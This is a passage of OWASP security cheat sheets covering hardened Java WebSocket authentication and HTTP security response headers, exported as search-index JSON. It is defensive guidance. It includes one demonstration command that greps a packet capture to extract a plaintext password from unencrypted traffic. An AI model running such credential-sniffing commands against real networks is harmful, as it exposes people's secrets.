JWT.require(algorithm).withIssuer(\"WEBSOCKET-SERVER\").build();\nreturn verifier.verify(token);\n}\n\n/**\n     * Load the JWT secret used to sign token using a byte array for secret storage in order\n     * to avoid persistent string in memory\n     *\n     * @return The secret as byte array\n     * @throws IOException If any error occur during the secret loading\n     */\nprivate static byte[] loadSecret() throws IOException {\nreturn Files.readAllBytes(Paths.get(\"src\", \"main\", \"resources\", \"jwt-secret.txt\"));\n}\n}\n

JSON schema of the input and output authentication message - Define the expected structure of the input and output messages from the authentication endpoint point of view

{\n\"$schema\": \"http://json-schema.org/schema#\",\n\"title\": \"AuthenticationRequest\",\n\"type\": \"object\",\n\"properties\": {\n\"login\": {\n\"type\": \"string\",\n\"pattern\": \"^[a-zA-Z]{1,10}$\"\n},\n\"password\": {\n\"type\": \"string\"\n}\n},\n\"required\": [\n\"login\",\n\"password\"\n]\n}\n\n{\n\"$schema\": \"http://json-schema.org/schema#\",\n\"title\": \"AuthenticationResponse\",\n\"type\": \"object\",\n\"properties\": {\n\"isSuccess;\": {\n\"type\": \"boolean\"\n},\n\"token\": {\n\"type\": \"string\",\n\"pattern\": \"^[a-zA-Z0-9+/=\\\\._-]{0,500}$\"\n},\n\"message\": {\n\"type\": \"string\",\n\"pattern\": \"^[a-zA-Z0-9!\\\\s]{0,100}$\"\n}\n},\n\"required\": [\n\"isSuccess\",\n\"token\",\n\"message\"\n]\n}\n

Authentication message decoder and encoder - Perform the JSON serialization/deserialization and the input/output validation using dedicated JSON Schemas. This makes it possible to systematically ensure that all messages received and sent by the endpoint strictly respect the expected structure and content.

import com.fasterxml.jackson.databind.JsonNode;\nimport com.github.fge.jackson.JsonLoader;\nimport com.github.fge.jsonschema.core.exceptions.ProcessingException;\nimport com.github.fge.jsonschema.core.report.ProcessingReport;\nimport com.github.fge.jsonschema.main.JsonSchema;\nimport com.github.fge.jsonschema.main.JsonSchemaFactory;\nimport com.google.gson.Gson;\nimport org.owasp.pocwebsocket.vo.AuthenticationRequest;\n\nimport javax.websocket.DecodeException;\nimport javax.websocket.Decoder;\nimport javax.websocket.EndpointConfig;\nimport java.io.File;\nimport java.io.IOException;\n\n/**\n * Decode JSON text representation to an AuthenticationRequest object\n * <p>\n * As there's one instance of the decoder class by endpoint session so we can use the\n * JsonSchema as decoder instance variable.\n */\npublic class AuthenticationRequestDecoder implements Decoder.Text<AuthenticationRequest> {\n\n/**\n     * JSON validation schema associated to this type of message\n     */\nprivate JsonSchema validationSchema = null;\n\n/**\n     * Initialize decoder and associated JSON validation schema\n     *\n     * @throws IOException If any error occur during the object creation\n     * @throws ProcessingException If any error occur during the schema loading\n     */\npublic AuthenticationRequestDecoder() throws IOException, ProcessingException {\nJsonNode node = JsonLoader.fromFile(\nnew File(\"src/main/resources/authentication-request-schema.json\"));\nthis.validationSchema = JsonSchemaFactory.byDefault().getJsonSchema(node);\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic AuthenticationRequest decode(String s) throws DecodeException {\ntry {\n//Validate the provided representation against the dedicated schema\n//Use validation mode with report in order to enable further inspection/tracing\n//of the error details\n//Moreover the validation method \"validInstance()\" generate a NullPointerException\n//if the representation do not respect the expected schema\n//so it's more proper to use the validation method with report\nProcessingReport validationReport = this.validationSchema.validate(JsonLoader.fromString(s),\ntrue);\n//Ensure there no error\nif (!validationReport.isSuccess()) {\n//Simply reject the message here: Don't care about error details...\nthrow new DecodeException(s, \"Validation of the provided representation failed !\");\n}\n} catch (IOException | ProcessingException e) {\nthrow new DecodeException(s, \"Cannot validate the provided representation to a\"\n+ \" JSON valid representation !\", e);\n}\n\nreturn new Gson().fromJson(s, AuthenticationRequest.class);\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic boolean willDecode(String s) {\nboolean canDecode = false;\n\n//If the provided JSON representation is empty/null then we indicate that\n//representation cannot be decoded to our expected object\nif (s == null || s.trim().isEmpty()) {\nreturn canDecode;\n}\n\n//Try to cast the provided JSON representation to our object to validate at least\n//the structure (content validation is done during decoding)\ntry {\nAuthenticationRequest test = new Gson().fromJson(s, AuthenticationRequest.class);\ncanDecode = (test != null);\n} catch (Exception e) {\n//Ignore explicitly any casting error...\n}\n\nreturn canDecode;\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void init(EndpointConfig config) {\n//Not used\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void destroy() {\n//Not used\n}\n}\n
import com.fasterxml.jackson.databind.JsonNode;\nimport com.github.fge.jackson.JsonLoader;\nimport com.github.fge.jsonschema.core.exceptions.ProcessingException;\nimport com.github.fge.jsonschema.core.report.ProcessingReport;\nimport com.github.fge.jsonschema.main.JsonSchema;\nimport com.github.fge.jsonschema.main.JsonSchemaFactory;\nimport com.google.gson.Gson;\nimport org.owasp.pocwebsocket.vo.AuthenticationResponse;\n\nimport javax.websocket.EncodeException;\nimport javax.websocket.Encoder;\nimport javax.websocket.EndpointConfig;\nimport java.io.File;\nimport java.io.IOException;\n\n/**\n * Encode AuthenticationResponse object to JSON text representation.\n * <p>\n * As there one instance of the encoder class by endpoint session so we can use\n * the JsonSchema as encoder instance variable.\n */\npublic class AuthenticationResponseEncoder implements Encoder.Text<AuthenticationResponse> {\n\n/**\n     * JSON validation schema associated to this type of message\n     */\nprivate JsonSchema validationSchema = null;\n\n/**\n     * Initialize encoder and associated JSON validation schema\n     *\n     * @throws IOException If any error occur during the object creation\n     * @throws ProcessingException If any error occur during the schema loading\n     */\npublic AuthenticationResponseEncoder() throws IOException, ProcessingException {\nJsonNode node = JsonLoader.fromFile(\nnew File(\"src/main/resources/authentication-response-schema.json\"));\nthis.validationSchema = JsonSchemaFactory.byDefault().getJsonSchema(node);\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic String encode(AuthenticationResponse object) throws EncodeException {\n//Generate the JSON representation\nString json = new Gson().toJson(object);\ntry {\n//Validate the generated representation against the dedicated schema\n//Use validation mode with report in order to enable further inspection/tracing\n//of the error details\n//Moreover the validation method \"validInstance()\" generate a NullPointerException\n//if the representation do not respect the expected schema\n//so it's more proper to use the validation method with report\nProcessingReport validationReport = this.validationSchema.validate(JsonLoader.fromString(json),\ntrue);\n//Ensure there no error\nif (!validationReport.isSuccess()) {\n//Simply reject the message here: Don't care about error details...\nthrow new EncodeException(object, \"Validation of the generated representation failed !\");\n}\n} catch (IOException | ProcessingException e) {\nthrow new EncodeException(object, \"Cannot validate the generated representation to a\"+\n\" JSON valid representation !\", e);\n}\n\nreturn json;\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void init(EndpointConfig config) {\n//Not used\n}\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void destroy() {\n//Not used\n}\n\n}\n

Note that the same approach is used in the message handling part of the POC. All messages exchanged between the client and the server are systematically validated in the same way, using dedicated JSON schemas linked to message-specific Encoders/Decoders (serialization/deserialization).
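
As an illustration, the message endpoint can declare its dedicated decoder/encoder the same way as the authentication endpoint, so that every MessageRequest/MessageResponse passes through the JSON Schema validation. The sketch below assumes package and class names that mirror the authentication endpoint; it is not the POC's actual source:

import org.owasp.pocwebsocket.configurator.EndpointConfigurator;\nimport org.owasp.pocwebsocket.decoder.MessageRequestDecoder;\nimport org.owasp.pocwebsocket.encoder.MessageResponseEncoder;\nimport org.owasp.pocwebsocket.handler.MessageHandler;\n\nimport javax.websocket.OnOpen;\nimport javax.websocket.Session;\nimport javax.websocket.server.ServerEndpoint;\n\n/**\n * Hypothetical message endpoint showing how the dedicated encoder/decoder\n * (and therefore the JSON Schema validation) is wired onto the message exchange\n */\n@ServerEndpoint(value = \"/msg\", configurator = EndpointConfigurator.class,\nsubprotocols = {\"message\"}, encoders = {MessageResponseEncoder.class},\ndecoders = {MessageRequestDecoder.class})\npublic class MessageEndpoint {\n\n@OnOpen\npublic void start(Session session) {\n//Apply the same hardening as the authentication endpoint (idle timeout, message size limits)\nsession.setMaxIdleTimeout(60000);\n//Process incoming MessageRequest objects with the message handler shown later in this section\nsession.addMessageHandler(new MessageHandler(session.getBasicRemote()));\n}\n}\n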

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#authorization-and-access-token-explicit-invalidation","title":"Authorization and access token explicit invalidation","text":"

Authorization information is stored in the access token using the JWT Claim feature (in the POC the name of the claim is access_level). Authorization is validated when a request is received, before any other action that uses the user input information.

The access token is passed with every message sent to the message endpoint and a block list is used in order to allow the user to request an explicit token invalidation.

Explicit token invalidation is interesting from a user's point of view because, when tokens are used, the validity timeframe is often relatively long (it's common to see validity periods longer than 1 hour), so it's important to give the user a way to tell the system \"OK, I have finished my exchange with you, so you can close our exchange session and clean up associated links\".

It also allows users to revoke their own current access if malicious concurrent access using the same token is detected (the token-stealing case).

Token block list - Maintains a temporary, memory- and time-limited cache of the hashes of tokens that are no longer allowed to be used

import org.apache.commons.jcs.JCS;\nimport org.apache.commons.jcs.access.CacheAccess;\nimport org.apache.commons.jcs.access.exception.CacheException;\n\nimport javax.xml.bind.DatatypeConverter;\nimport java.security.MessageDigest;\nimport java.security.NoSuchAlgorithmException;\n\n/**\n * Utility class to manage the access token that have been declared as no\n * more usable (explicit user logout)\n */\npublic class AccessTokenBlocklistUtils {\n/**\n     * Message content send by user that indicate that the access token that\n     * come along the message must be block-listed for further usage\n     */\npublic static final String MESSAGE_ACCESS_TOKEN_INVALIDATION_FLAG = \"INVALIDATE_TOKEN\";\n\n/**\n     * Use cache to store block-listed token hash in order to avoid memory exhaustion and be consistent\n     * because token are valid 30 minutes so the item live in cache 60 minutes\n     */\nprivate static final CacheAccess<String, String> TOKEN_CACHE;\n\nstatic {\ntry {\nTOKEN_CACHE = JCS.getInstance(\"default\");\n} catch (CacheException e) {\nthrow new RuntimeException(\"Cannot init token cache !\", e);\n}\n}\n\n/**\n     * Add token into the block list\n     *\n     * @param token Token for which the hash must be added\n     * @throws NoSuchAlgorithmException If SHA256 is not available\n     */\npublic static void addToken(String token) throws NoSuchAlgorithmException {\nif (token != null && !token.trim().isEmpty()) {\nString hashHex = computeHash(token);\nif (TOKEN_CACHE.get(hashHex) == null) {\nTOKEN_CACHE.putSafe(hashHex, hashHex);\n}\n}\n}\n\n/**\n     * Check if a token is present in the block list\n     *\n     * @param token Token for which the presence of the hash must be verified\n     * @return TRUE if token is block-listed\n     * @throws NoSuchAlgorithmException If SHA256 is not available\n     */\npublic static boolean isBlocklisted(String token) throws NoSuchAlgorithmException {\nboolean exists = false;\nif (token != null && !token.trim().isEmpty()) {\nString hashHex = computeHash(token);\nexists = (TOKEN_CACHE.get(hashHex) != null);\n}\nreturn exists;\n}\n\n/**\n     * Compute the SHA256 hash of a token\n     *\n     * @param token Token for which the hash must be computed\n     * @return The hash encoded in HEX\n     * @throws NoSuchAlgorithmException If SHA256 is not available\n     */\nprivate static String computeHash(String token) throws NoSuchAlgorithmException {\nString hashHex = null;\nif (token != null && !token.trim().isEmpty()) {\nMessageDigest md = MessageDigest.getInstance(\"SHA-256\");\nbyte[] hash = md.digest(token.getBytes());\nhashHex = DatatypeConverter.printHexBinary(hash);\n}\nreturn hashHex;\n}\n\n}\n
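
Note that the 60-minute lifetime mentioned in the comment is not enforced by this class itself; it is assumed to come from the configuration of the JCS \"default\" cache region (typically a cache.ccf entry such as an element MaxLife of 3600 seconds), so make sure that region is actually configured with a bounded size and lifetime.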

Message handling - Processes a request from a user to add a message to the list, and shows an example authorization validation approach

import com.auth0.jwt.interfaces.Claim;\nimport com.auth0.jwt.interfaces.DecodedJWT;\nimport org.owasp.pocwebsocket.enumeration.AccessLevel;\nimport org.owasp.pocwebsocket.util.AccessTokenBlocklistUtils;\nimport org.owasp.pocwebsocket.util.AuthenticationUtils;\nimport org.owasp.pocwebsocket.util.MessageUtils;\nimport org.owasp.pocwebsocket.vo.MessageRequest;\nimport org.owasp.pocwebsocket.vo.MessageResponse;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.EncodeException;\nimport javax.websocket.RemoteEndpoint;\nimport java.io.IOException;\nimport java.util.ArrayList;\nimport java.util.List;\n\n/**\n * Handle message flow\n */\npublic class MessageHandler implements javax.websocket.MessageHandler.Whole<MessageRequest> {\n\nprivate static final Logger LOG = LoggerFactory.getLogger(MessageHandler.class);\n\n/**\n     * Reference to the communication channel with the client\n     */\nprivate RemoteEndpoint.Basic clientConnection;\n\n/**\n     * Constructor\n     *\n     * @param clientConnection Reference to the communication channel with the client\n     */\npublic MessageHandler(RemoteEndpoint.Basic clientConnection) {\nthis.clientConnection = clientConnection;\n}\n\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void onMessage(MessageRequest message) {\nMessageResponse response = null;\ntry {\n/*Step 1: Verify the token*/\nString token = message.getToken();\n//Verify if is it in the block list\nif (AccessTokenBlocklistUtils.isBlocklisted(token)) {\nthrow new IllegalAccessException(\"Token is in the block list !\");\n}\n\n//Verify the signature of the token\nDecodedJWT decodedToken = AuthenticationUtils.validateToken(token);\n\n/*Step 2: Verify the authorization (access level)*/\nClaim accessLevel = decodedToken.getClaim(\"access_level\");\nif (accessLevel == null || AccessLevel.valueOf(accessLevel.asString()) == null) {\nthrow new IllegalAccessException(\"Token have an invalid access level claim !\");\n}\n\n/*Step 3: Do the expected processing*/\n//Init the list of the messages for the current user\nif (!MessageUtils.MESSAGES_DB.containsKey(decodedToken.getSubject())) {\nMessageUtils.MESSAGES_DB.put(decodedToken.getSubject(), new ArrayList<>());\n}\n\n//Add message to the list of message of the user if the message is a not a token invalidation\n//order otherwise add the token to the block list\nif (AccessTokenBlocklistUtils.MESSAGE_ACCESS_TOKEN_INVALIDATION_FLAG\n.equalsIgnoreCase(message.getContent().trim())) {\nAccessTokenBlocklistUtils.addToken(message.getToken());\n} else {\nMessageUtils.MESSAGES_DB.get(decodedToken.getSubject()).add(message.getContent());\n}\n\n//According to the access level of user either return only is message or return all message\nList<String> messages = new ArrayList<>();\nif (accessLevel.asString().equals(AccessLevel.USER.name())) {\nMessageUtils.MESSAGES_DB.get(decodedToken.getSubject())\n.forEach(s -> messages.add(String.format(\"(%s): %s\", decodedToken.getSubject(), s)));\n} else if (accessLevel.asString().equals(AccessLevel.ADMIN.name())) {\nMessageUtils.MESSAGES_DB.forEach((k, v) ->\nv.forEach(s -> messages.add(String.format(\"(%s): %s\", k, s))));\n}\n\n//Build the response object indicating that exchange succeed\nif (AccessTokenBlocklistUtils.MESSAGE_ACCESS_TOKEN_INVALIDATION_FLAG\n.equalsIgnoreCase(message.getContent().trim())) {\nresponse = new MessageResponse(true, messages, \"Token added to the block list\");\n}else{\nresponse = new MessageResponse(true, messages, \"\");\n}\n\n} catch (Exception e) 
{\nLOG.error(\"[MessageHandler] Error occur in exchange process.\", e);\n//Build the response object indicating that exchange fail\n//We send the error detail on client because ware are in POC (it will not the case in a real app)\nresponse = new MessageResponse(false, new ArrayList<>(), \"Error occur during exchange: \"\n+ e.getMessage());\n} finally {\n//Send response\ntry {\nthis.clientConnection.sendObject(response);\n} catch (IOException | EncodeException e) {\nLOG.error(\"[MessageHandler] Error occur in response object sending.\", e);\n}\n}\n}\n}\n
"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#confidentiality-and-integrity","title":"Confidentiality and Integrity","text":"

If the raw version of the protocol is used (protocol ws://) then the transferred data is exposed to eavesdropping and potential on-the-fly alteration.

Example of a capture using Wireshark, searching for password exchanges in the stored PCAP file (non-printable characters have been explicitly removed from the command output):

$ grep -aE '(password)' capture.pcap\n{\"login\":\"bob\",\"password\":\"bob123\"}\n

There is a way to check, at the WebSocket endpoint level, whether the channel is secure, by calling the isSecure() method on the session object instance.

Example implementation in the endpoint method in charge of setting up the session and assigning the message handler:

/**\n * Handle the beginning of an exchange\n *\n * @param session Exchange session information\n */\n@OnOpen\npublic void start(Session session) {\n...\n//Affect a new message handler instance in order to process the exchange only if the channel is secured\nif(session.isSecure()) {\nsession.addMessageHandler(new AuthenticationMessageHandler(session.getBasicRemote()));\n}else{\nLOG.info(\"[AuthenticationEndpoint] Session {} do not use a secure channel so no message handler \" +\n\"was affected for processing and session was explicitly closed !\", session.getId());\ntry{\nsession.close(new CloseReason(CloseReason.CloseCodes.CANNOT_ACCEPT,\"Insecure channel used !\"));\n}catch(IOException e){\nLOG.error(\"[AuthenticationEndpoint] Session {} cannot be explicitly closed !\", session.getId(),\ne);\n}\n\n}\nLOG.info(\"[AuthenticationEndpoint] Session {} message handler affected for processing\", session.getId());\n}\n

Expose WebSocket endpoints only over the wss:// protocol (WebSockets over SSL/TLS) in order to ensure the confidentiality and integrity of the traffic, just as HTTP over SSL/TLS is used to secure HTTP exchanges.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html","title":"HTTP Security Response Headers Cheat Sheet","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#introduction","title":"Introduction","text":"

HTTP Headers are a great booster for web security with easy implementation. Proper HTTP response headers can help prevent security vulnerabilities like Cross-Site Scripting, Clickjacking, Information disclosure and more.

In this cheat sheet, we will review all security-related HTTP headers, recommended configurations, and reference other sources for complicated headers.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#security-headers","title":"Security Headers","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-frame-options","title":"X-Frame-Options","text":"

The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame>, <iframe>, <embed> or <object>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.

Content Security Policy (CSP) frame-ancestors directive obsoletes X-Frame-Options for supporting browsers (source).

The X-Frame-Options header is only useful when the HTTP response it is included in has something to interact with (e.g. links, buttons). If the HTTP response is a redirect or an API returning JSON data, X-Frame-Options does not provide any security.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation","title":"Recommendation","text":"

Use Content Security Policy (CSP) frame-ancestors directive if possible.
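
For example, the CSP directive equivalent to denying all framing is:

Content-Security-Policy: frame-ancestors 'none'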

Do not allow displaying of the page in a frame.

X-Frame-Options: DENY

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-xss-protection","title":"X-XSS-Protection","text":"

The HTTP X-XSS-Protection response header is a feature of Internet Explorer, Chrome, and Safari that stops pages from loading when they detect reflected cross-site scripting (XSS) attacks.

WARNING: Even though this header can protect users of older web browsers that don't yet support CSP, in some cases this header can create XSS vulnerabilities in otherwise safe websites (source).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_1","title":"Recommendation","text":"

Use a Content Security Policy (CSP) that disables the use of inline JavaScript.

Do not set this header or explicitly turn it off.

X-XSS-Protection: 0

Please see Mozilla X-XSS-Protection for details.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-content-type-options","title":"X-Content-Type-Options","text":"

The X-Content-Type-Options response HTTP header is used by the server to indicate to the browsers that the MIME types advertised in the Content-Type headers should be followed and not guessed.

This header is used to block browsers' MIME type sniffing, which can transform non-executable MIME types into executable MIME types (MIME Confusion Attacks).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_2","title":"Recommendation","text":"

Set the Content-Type header correctly throughout the site.

X-Content-Type-Options: nosniff

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#referrer-policy","title":"Referrer-Policy","text":"

The Referrer-Policy HTTP header controls how much referrer information (sent via the Referer header) should be included with requests.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_3","title":"Recommendation","text":"

Referrer policy has been supported by browsers since 2014. Today, the default behavior in modern browsers is to no longer send all referrer information (origin, path, and query string) to the same site but to only send the origin to other sites. However, since not all users may be using the latest browsers we suggest forcing this behavior by sending this header on all requests.

Referrer-Policy: strict-origin-when-cross-origin

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#content-type","title":"Content-Type","text":"

The Content-Type representation header is used to indicate the original media type of the resource (before any content encoding is applied for sending). If not set correctly, the resource (e.g. an image) may be interpreted as HTML, making XSS vulnerabilities possible.

Although it is recommended to always set the Content-Type header correctly, it would constitute a vulnerability only if the content is intended to be rendered by the client and the resource is untrusted (provided or modified by a user).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_4","title":"Recommendation","text":"

Content-Type: text/html; charset=UTF-8

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#set-cookie","title":"Set-Cookie","text":"

The Set-Cookie HTTP response header is used to send a cookie from the server to the user agent, so the user agent can send it back to the server later. To send multiple cookies, multiple Set-Cookie headers should be sent in the same response.

This is not a security header per se, but its security attributes are crucial.
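
For example, a session cookie hardened with common security attributes could look like this (cookie name and value are illustrative):

Set-Cookie: SESSIONID=a1b2c3d4e5f6; Secure; HttpOnly; SameSite=Strict; Path=/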

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_5","title":"Recommendation","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#strict-transport-security-hsts","title":"Strict-Transport-Security (HSTS)","text":"

The HTTP Strict-Transport-Security response header (often abbreviated as HSTS) lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_6","title":"Recommendation","text":"

Strict-Transport-Security: max-age=63072000; includeSubDomains; preload

Please check out the HTTP Strict Transport Security Cheat Sheet for more information.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#expect-ct","title":"Expect-CT \u274c","text":"

The Expect-CT header lets sites opt-in to reporting of Certificate Transparency (CT) requirements. Given that mainstream clients now require CT qualification, the only remaining value is reporting such occurrences to the nominated report-uri value in the header. The header is now less about enforcement and more about detection/reporting.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_7","title":"Recommendation","text":"

Do not use it. Mozilla recommends avoiding it, and removing it from existing code if possible.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#content-security-policy-csp","title":"Content-Security-Policy (CSP)","text":"

Content Security Policy (CSP) is a security feature that is used to specify the origin of content that is allowed to be loaded on a website or in a web application. It is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement to distribution of malware.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_8","title":"Recommendation","text":"

Content Security Policy is complex to configure and maintain. For an explanation of the customization options, please read the Content Security Policy Cheat Sheet.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#access-control-allow-origin","title":"Access-Control-Allow-Origin","text":"

If you don't use this header, your site is protected by default by the Same Origin Policy (SOP). What this header does is relax this control in specified circumstances.

Access-Control-Allow-Origin is a CORS (cross-origin resource sharing) header. This header indicates whether the response it is related to can be shared with requesting code from the given origin. In other words, if siteA requests a resource from siteB, siteB should indicate in its Access-Control-Allow-Origin header that siteA is allowed to fetch that resource; if not, access is blocked by the Same Origin Policy (SOP).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_9","title":"Recommendation","text":"

If you use it, set specific origins instead of *. Check out Access-Control-Allow-Origin for details.

Access-Control-Allow-Origin: https://yoursite.com

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#cross-origin-opener-policy-coop","title":"Cross-Origin-Opener-Policy (COOP)","text":"

The HTTP Cross-Origin-Opener-Policy (COOP) response header allows you to ensure a top-level document does not share a browsing context group with cross-origin documents.

This header works together with Cross-Origin-Embedder-Policy (COEP) and Cross-Origin-Resource-Policy (CORP) explained below.

This mechanism protects against attacks like Spectre which can cross the security boundary established by Same Origin Policy (SOP) for resources in the same browsing context group.

As these headers are closely tied to browsers, they may not make sense for REST APIs or clients that are not browsers.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_10","title":"Recommendation","text":"

Isolates the browsing context exclusively to same-origin documents.

Cross-Origin-Opener-Policy: same-origin

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#cross-origin-embedder-policy-coep","title":"Cross-Origin-Embedder-Policy (COEP)","text":"

The HTTP Cross-Origin-Embedder-Policy (COEP) response header prevents a document from loading any cross-origin resources that don't explicitly grant the document permission (using CORP or CORS).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_11","title":"Recommendation","text":"

A document can only load resources from the same origin, or resources explicitly marked as loadable from another origin.

Cross-Origin-Embedder-Policy: require-corp

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#cross-origin-resource-policy-corp","title":"Cross-Origin-Resource-Policy (CORP)","text":"

The Cross-Origin-Resource-Policy (CORP) header allows you to control the set of origins that are empowered to include a resource. It is a robust defense against attacks like Spectre, as it allows browsers to block a given response before it enters an attacker's process.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_12","title":"Recommendation","text":"

Limit current resource loading to the site and sub-domains only.

Cross-Origin-Resource-Policy: same-site

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#permissions-policy-formerly-feature-policy","title":"Permissions-Policy (formerly Feature-Policy)","text":"

Permissions-Policy allows you to control which origins can use which browser features, both in the top-level page and in embedded frames. For every feature controlled by Feature Policy, the feature is only enabled in the current document or frame if its origin matches the allowed list of origins. This means that you can configure your site to never allow the camera or microphone to be activated. This prevents an injection, for example an XSS, from enabling the camera, the microphone, or other browser features.

More information: Permissions-Policy

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_13","title":"Recommendation","text":"

Set it and disable all the features that your site does not need or allow them only to the authorized domains:

Permissions-Policy: geolocation=(), camera=(), microphone=()

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#floc-federated-learning-of-cohorts","title":"FLoC (Federated Learning of Cohorts)","text":"

FLoC is a method proposed by Google in 2021 to deliver interest-based advertisements to groups of users (\"cohorts\"). The Electronic Frontier Foundation, Mozilla, and others believe FLoC does not do enough to protect users' privacy.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_14","title":"Recommendation","text":"

A site can declare that it does not want to be included in the user's list of sites for cohort calculation by sending this HTTP header.

Permissions-Policy: interest-cohort=()

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#server","title":"Server","text":"

The Server header describes the software used by the origin server that handled the request \u2014 that is, the server that generated the response.

This is not a security header, but how it is used is relevant for security.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_15","title":"Recommendation","text":"

Remove this header or set non-informative values.

Server: webserver

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-powered-by","title":"X-Powered-By","text":"

The X-Powered-By header describes the technologies used by the webserver. This information exposes the server to attackers. Using the information in this header, attackers can find vulnerabilities more easily.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_16","title":"Recommendation","text":"

Remove all X-Powered-By headers.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-aspnet-version","title":"X-AspNet-Version","text":"

Provides information about the .NET version.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_17","title":"Recommendation","text":"

Disable sending this header. Add the following line in your web.config in the <system.web> section to remove it.

<httpRuntime enableVersionHeader=\"false\" />\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-aspnetmvc-version","title":"X-AspNetMvc-Version","text":"

Provides information about the ASP.NET MVC version.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_18","title":"Recommendation","text":"

Disable sending this header. To remove the X-AspNetMvc-Version header, add the line below to the Global.asax file.

MvcHandler.DisableMvcResponseHeader = true;\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-dns-prefetch-control","title":"X-DNS-Prefetch-Control","text":"

The X-DNS-Prefetch-Control HTTP response header controls DNS prefetching, a feature by which browsers proactively perform domain name resolution on both links that the user may choose to follow as well as URLs for items referenced by the document, including images, CSS, JavaScript, and so forth.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_19","title":"Recommendation","text":"

The default behavior of browsers is to perform DNS prefetching, which is good for most websites. If you do not control the links on your website, you might want to set off as the value to disable DNS prefetching and avoid leaking information to those domains.

X-DNS-Prefetch-Control: off

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#public-key-pins-hpkp","title":"Public-Key-Pins (HPKP)","text":"

The HTTP Public-Key-Pins response header is used to associate a specific cryptographic public key with a certain web server to decrease the risk of MITM attacks with forged certificates.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_20","title":"Recommendation","text":"

This header is deprecated and should not be used anymore.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#adding-http-headers-in-different-technologies","title":"Adding HTTP Headers in Different Technologies","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#php","title":"PHP","text":"

The sample code below sets the X-Frame-Options header in PHP.

header(\"X-Frame-Options: DENY\");\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#apache","title":"Apache","text":"

Below is an .htaccess sample configuration which sets the X-Frame-Options header in Apache.

<IfModule mod_headers.c>\nHeader set X-Frame-Options \"DENY\"\n</IfModule>\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#iis","title":"IIS","text":"

Add the configuration below to your Web.config in IIS to send the X-Frame-Options header.

<system.webServer>\n...\n <httpProtocol>\n<customHeaders>\n<add name=\"X-Frame-Options\" value=\"DENY\" />\n</customHeaders>\n</httpProtocol>\n...\n</system.webServer>\n
